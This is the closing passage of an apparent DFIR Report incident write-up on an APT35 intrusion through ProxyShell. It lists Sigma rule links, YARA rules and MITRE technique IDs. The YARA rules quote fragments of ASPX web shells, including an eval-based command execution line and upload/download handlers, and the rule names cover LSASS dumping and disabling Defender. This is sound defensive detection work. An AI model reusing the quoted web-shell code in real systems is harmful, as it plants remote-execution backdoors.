noopener">https://github.com/SigmaHQ/sigma/blob/682e0458a336c3a6e93b18f7e972e1d67ef01598/rules/windows/process_creation/win_powershell_defender_exclusion.yml</a></p> <p>PowerShell Get-Process LSASS – <a href="https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_susp_powershell_getprocess_lsass.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_susp_powershell_getprocess_lsass.yml</a></p> <p>Process Dump via Comsvcs DLL – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_susp_comsvcs_procdump.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_susp_comsvcs_procdump.yml</a></p> <p>Quick Execution of a Series of Suspicious Commands – <a href="https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_multiple_suspicious_cli.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_multiple_suspicious_cli.yml</a></p> <p>Rare Scheduled Task Creations – <a href="https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/other/taskscheduler/win_rare_schtask_creation.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/other/taskscheduler/win_rare_schtask_creation.yml</a></p> <p>Service Execution – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_service_execution.yml" target="_blank" rel="noreferrer 
noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_service_execution.yml</a></p> <p>Shells Spawned by Web Servers – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_webshell_spawn.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_webshell_spawn.yml</a></p> <p>Suspicious PowerShell Parent Process – <a href="https://github.com/SigmaHQ/sigma/blob/6f5271275e9ac22be9ded8b9252bce064e524153/rules/windows/process_creation/win_susp_powershell_parent_process.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/6f5271275e9ac22be9ded8b9252bce064e524153/rules/windows/process_creation/win_susp_powershell_parent_process.yml</a></p> <p>Suspicious Script Execution From Temp Folder – <a href="https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_susp_script_exec_from_temp.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_susp_script_exec_from_temp.yml</a></p> <p>Wdigest Enable UseLogonCredential – <a href="https://github.com/SigmaHQ/sigma/blob/503df469687fe4d14d2119a95723485d079ec0d9/rules/windows/registry_event/sysmon_wdigest_enable_uselogoncredential.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/503df469687fe4d14d2119a95723485d079ec0d9/rules/windows/registry_event/sysmon_wdigest_enable_uselogoncredential.yml</a></p> <p>Webshell Detection With Command Line Keywords – <a href="https://github.com/SigmaHQ/sigma/blob/1cfca93354d25e458db40f8d48403602b46bbf03/rules/windows/process_creation/win_webshell_detection.yml" target="_blank" rel="noreferrer 
noopener">https://github.com/SigmaHQ/sigma/blob/1cfca93354d25e458db40f8d48403602b46bbf03/rules/windows/process_creation/win_webshell_detection.yml</a></p> <p>Windows Defender Real-Time Protection Disabled – <a href="https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml</a></p> <p>Windows Defender Threat Detection Disabled – <a href="https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_disabled.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_disabled.yml</a></p> <p>Windows Shell Spawning Suspicious Program – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_shell_spawn_susp_program.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_shell_spawn_susp_program.yml</a></p> <p>Windows Suspicious Use Of Web Request in CommandLine – <a href="https://github.com/SigmaHQ/sigma/blob/98d7380a40d503ffd225420f7318b79d9f5097b8/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/98d7380a40d503ffd225420f7318b79d9f5097b8/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml</a></p> <p>Windows Webshell Creation – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/file_event/sysmon_webshell_creation_detect.yml" 
target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/file_event/sysmon_webshell_creation_detect.yml</a></p> <h3 class="wp-block-heading">Yara</h3> <pre>rule files_dhvqx { meta: description = "9893_files - file dhvqx.aspx" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "c5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8" strings: $s1 = "eval(Request['exec_code'],'unsafe');Response.End;" fullword ascii $s2 = "6<script language='JScript' runat='server'>" fullword ascii $s3 = "AEALAAAAAAAAAAA" fullword ascii $s4 = "AFAVAJA" fullword ascii $s5 = "AAAAAAV" fullword ascii $s6 = "LAAAAAAA" fullword ascii $s7 = "ANAZAQA" fullword ascii $s8 = "ALAAAAA" fullword ascii $s9 = "AAAAAEA" ascii $s10 = "ALAHAUA" fullword ascii condition: uint16(0) == 0x4221 and filesize < 800KB and ($s1 and $s2) and 4 of them } rule aspx_dyukbdcxjfi { meta: description = "9893_files - file aspx_dyukbdcxjfi.aspx" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "84f77fc4281ebf94ab4897a48aa5dd7092cc0b7c78235965637eeef0908fb6c7" strings: $s1 = "string[] commands = exec_code.Substring(\"run \".Length).Split(new[] { ';' }, StringSplitOptions.RemoveEmpty" ascii $s2 = "string[] commands = exec_code.Substring(\"run \".Length).Split(new[] { ';' }, StringSplitOptions.RemoveEmpty" ascii $s3 = "var dstFile = Path.Combine(dstDir, Path.GetFileName(httpPostedFile.FileName));" fullword ascii $s4 = "info.UseShellExecute = false;" fullword ascii $s5 = "using (StreamReader streamReader = process.StandardError)" fullword ascii $s6 = "return httpPostedFile.FileName + \" Uploaded to: \" + dstFile;" fullword ascii $s7 = "else if (exec_code.StartsWith(\"download \"))" fullword ascii $s8 = "string[] parts = 
exec_code.Substring(\"download \".Length).Split(' ');" fullword ascii $s9 = "Response.AppendHeader(\"Content-Disposition\", \"attachment; filename=\" + fileName);" fullword ascii $s10 = "result = result + Environment.NewLine + \"ERROR:\" + Environment.NewLine + error;" fullword ascii $s11 = "else if (exec_code == \"get\")" fullword ascii $s12 = "int fileLength = httpPostedFile.ContentLength;" fullword ascii condition: uint16(0) == 0x4221 and filesize < 800KB and 8 of them } rule files_user { meta: description = "9893_files - file user.exe" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b" strings: $x1 = "PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVer" ascii $s2 = "\", or \"requireAdministrator\" --> <v3:requestedExecutionLevel level=\"requireAdministrator\" /> </v3:requestedPrivileges> </v3" ascii $s3 = "-InitOnceExecuteOnce" fullword ascii $s4 = "0\"> <dependency> <dependentAssembly> <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0." 
ascii $s5 = "s:v3=\"urn:schemas-microsoft-com:asm.v3\"> <v3:security> <v3:requestedPrivileges> <!-- level can be \"asInvoker\", \"highestAvai" ascii $s6 = "PB_GadgetStack_%I64i" fullword ascii $s7 = "PB_DropAccept" fullword ascii $s8 = "rocessorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" /> </dependentAssembly> </dependency> <v3:trustInf" ascii $s9 = "PB_PostEventMessage" fullword ascii $s10 = "PB_WindowID" fullword ascii $s11 = "?GetLongPathNameA" fullword ascii $s12 = "Memory page error" fullword ascii $s13 = "PPPPPPH" fullword ascii $s14 = "YZAXAYH" fullword ascii $s15 = "%d:%I64d:%I64d:%I64d" fullword ascii $s16 = "NGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDI" ascii $s17 = "PYZAXAYH" fullword ascii $s18 = "PB_MDI_Gadget" fullword ascii $s19 = "PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVer" ascii $s20 = " 46B722FD25E69870FA7711924BC5304D 787242D55F2C49A23F5D97710D972108 A2DB26CE3BBE7B2CB12F9BEFB37891A3" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) and 4 of them } rule task_update { meta: description = "9893_files - file task_update.exe" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a" strings: $x1 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersi" ascii $s2 = " or \"requireAdministrator\" --> <v3:requestedExecutionLevel level=\"requireAdministrator\" /> </v3:requestedPrivileges> </v3:se" ascii $s3 = "-InitOnceExecuteOnce" fullword ascii $s4 = "> <dependency> <dependentAssembly> <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0" ascii $s5 = 
"v3=\"urn:schemas-microsoft-com:asm.v3\"> <v3:security> <v3:requestedPrivileges> <!-- level can be \"asInvoker\", \"highestAvaila" ascii $s6 = "PB_GadgetStack_%I64i" fullword ascii $s7 = "PB_DropAccept" fullword ascii $s8 = "PB_PostEventMessage" fullword ascii $s9 = "PB_WindowID" fullword ascii $s10 = "?GetLongPathNameA" fullword ascii $s11 = "cessorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" /> </dependentAssembly> </dependency> <v3:trustInfo " ascii $s12 = "Memory page error" fullword ascii $s13 = "PPPPPPH" fullword ascii $s14 = "YZAXAYH" fullword ascii $s15 = "%d:%I64d:%I64d:%I64d" fullword ascii $s16 = "PYZAXAYH" fullword ascii $s17 = "PB_MDI_Gadget" fullword ascii $s18 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersi" ascii $s19 = " 11FCC18FB2B55FC3C988F6A76FCF8A2D 56D49E57AD1A051BF62C458CD6F3DEA9 6104990DFEA3DFAB044FAF960458DB09" fullword wide $s20 = "PostEventClass" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) and 4 of them } rule App_Web_vjloy3pa { meta: description = "9893_files - file App_Web_vjloy3pa.dll" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "faa315db522d8ce597ac0aa957bf5bde31d91de94e68d5aefac4e3e2c11aa970" strings: $x2 = "hSystem.ComponentModel.DataAnnotations, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s3 = "MSystem.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s4 = "RSystem.Xml.Linq, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s5 = "ZSystem.ServiceModel.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s6 = "YSystem.Web.DynamicData, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s7 = 
"XSystem.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s8 = "VSystem.Web.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s9 = "MSystem.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s10 = "WSystem.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s11 = "`System.Data.DataSetExtensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s12 = "NSystem.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s13 = "ZSystem.WorkflowServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s14 = "WSystem.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s15 = "aSystem.ServiceModel.Activation, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s16 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" wide /* base64 encoded string '' */ $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" wide /* base64 encoded string '' */ $s18 = "aSystem.Web.ApplicationServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s19 = "\\System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s20 = "SMicrosoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and 1 of ($x*) and 4 of them } rule _user_task_update_0 { meta: description = "9893_files - from files user.exe, task_update.exe" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b" hash2 = 
"12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a" strings: $s1 = "-InitOnceExecuteOnce" fullword ascii $s2 = "PB_GadgetStack_%I64i" fullword ascii $s3 = "PB_DropAccept" fullword ascii $s4 = "PB_PostEventMessage" fullword ascii $s5 = "PB_WindowID" fullword ascii $s6 = "?GetLongPathNameA" fullword ascii $s7 = "Memory page error" fullword ascii $s8 = "PPPPPPH" fullword ascii $s9 = "YZAXAYH" fullword ascii $s10 = "%d:%I64d:%I64d:%I64d" fullword ascii $s11 = "PYZAXAYH" fullword ascii $s12 = "PB_MDI_Gadget" fullword ascii $s13 = "PostEventClass" fullword ascii $s14 = "t$hYZAXAYH" fullword ascii $s15 = "$YZAXAYH" fullword ascii $s16 = "Floating-point underflow (exponent too small)" fullword ascii $s17 = "Inexact floating-point result" fullword ascii $s18 = "Single step trap" fullword ascii $s19 = "Division by zero (floating-point)" fullword ascii $s20 = "tmHcI(H" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and ( 8 of them ) ) or ( all of them )<br />}</pre> <h3>MITRE</h3> <ul class="wp-block-list"> <li>Exploit Public-Facing Application – T1190</li> <li>OS Credential Dumping – T1003</li> <li>Account Manipulation – T1098</li> <li>Valid Accounts – T1078</li> <li>Ingress Tool Transfer – T1105</li> <li>Match Legitimate Name or Location – T1036.005</li> <li>Windows Service – T1543.003</li> <li>Web Shell – T1505.003</li> <li>System Information Discovery – T1082</li> <li>System Network Configuration Discovery – T1016</li> <li>System Owner/User Discovery – T1033</li> <li>Windows Command Shell – T1059.003</li> </ul> <p>Internal case #9893</p>
p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-submit{line-height:0;margin:0;padding:0}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__show-subs .wp-block-jetpack-subscriptions__subscount{font-size:16px;margin:8px 0;text-align:end}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__form-elements{display:block}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline button{display:inline-block;max-width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__subscount{text-align:start}#subscribe-submit.is-link{text-align:center;width:auto!important}#subscribe-submit.is-link a{margin-left:0!important;margin-top:0!important;width:auto!important}@keyframes jetpack-memberships_button__spinner-animation{to{transform:rotate(1turn)}}.jetpack-memberships-spinner{display:none;height:1em;margin:0 0 0 5px;width:1em}.jetpack-memberships-spinner svg{height:100%;margin-bottom:-2px;width:100%}.jetpack-memberships-spinner-rotating{animation:jetpack-memberships_button__spinner-animation .75s linear infinite;transform-origin:center}.is-loading .jetpack-memberships-spinner{display:inline-block}body.jetpack-memberships-modal-open{overflow:hidden}dialog.jetpack-memberships-modal{opacity:1}dialog.jetpack-memberships-modal,dialog.jetpack-memberships-modal 
iframe{background:#0000;border:0;bottom:0;box-shadow:none;height:100%;left:0;margin:0;padding:0;position:fixed;right:0;top:0;width:100%}dialog.jetpack-memberships-modal::backdrop{background-color:#000;opacity:.7;transition:opacity .2s ease-out}dialog.jetpack-memberships-modal.is-loading,dialog.jetpack-memberships-modal.is-loading::backdrop{opacity:0} </style> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/navigation.min.js?ver=6.7.2" id="freenews-navigation-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/skip-link-focus-fix.js?ver=6.7.2" id="freenews-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/ResizeSensor.min.js?ver=6.7.2" id="ResizeSensor-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/theia-sticky-sidebar.min.js?ver=6.7.2" id="theia-sticky-sidebar-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick.min.js?ver=6.7.2" id="slick-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick-settings.js?ver=6.7.2" id="freenews-slick-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/jquery.sticky.js?ver=6.7.2" id="jquery-sticky-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/sticky-setting.js?ver=6.7.2" id="freenews-sticky-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/jquery.marquee.min.js?ver=6.7.2" id="marquee-js"></script> <script type="text/javascript" 
src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/marquee-settings.js?ver=6.7.2" id="freenews-marquee-settings-js"></script> <script type="text/javascript" src="https://stats.wp.com/e-202508.js" id="jetpack-stats-js" data-wp-strategy="defer"></script> <script type="text/javascript" id="jetpack-stats-js-after"> /* <![CDATA[ */ _stq = window._stq || []; _stq.push([ "view", JSON.parse("{\"v\":\"ext\",\"blog\":\"175340963\",\"post\":\"5981\",\"tz\":\"0\",\"srv\":\"thedfirreport.com\",\"j\":\"1:14.3\"}") ]); _stq.push([ "clickTrackerInit", "175340963", "5981" ]); /* ]]> */ </script> <script type="text/javascript" id="google-translate-init-js-extra"> /* <![CDATA[ */ var _wp_google_translate_widget = {"lang":"en_US","layout":"0"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.3/_inc/build/widgets/google-translate/google-translate.min.js" id="google-translate-init-js"></script> <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit&ver=14.3" id="google-translate-js"></script> <script type="text/javascript" id="jetpack-blocks-assets-base-url-js-before"> /* <![CDATA[ */ var Jetpack_Block_Assets_Base_Url="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/"; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/dist/dom-ready.min.js" id="wp-dom-ready-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/dist/vendor/wp-polyfill.min.js" id="wp-polyfill-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/subscriptions/view.js?minify=false&ver=14.3" id="jetpack-block-subscriptions-js"></script> <script type="text/javascript" id="sharing-js-js-extra"> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"}; /* ]]> */ </script> <script type="text/javascript" 
src="https://c0.wp.com/p/jetpack/14.3/_inc/build/sharedaddy/sharing.min.js" id="sharing-js-js"></script> <script type="text/javascript" id="sharing-js-js-after"> /* <![CDATA[ */ var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-twitter' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-linkedin' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-linkedin' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! 
event.target ) { return; } var el; if ( matches( event.target, 'a.share-facebook' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' ); return false; } } ); } )(); /* ]]> */ </script> </body> </html>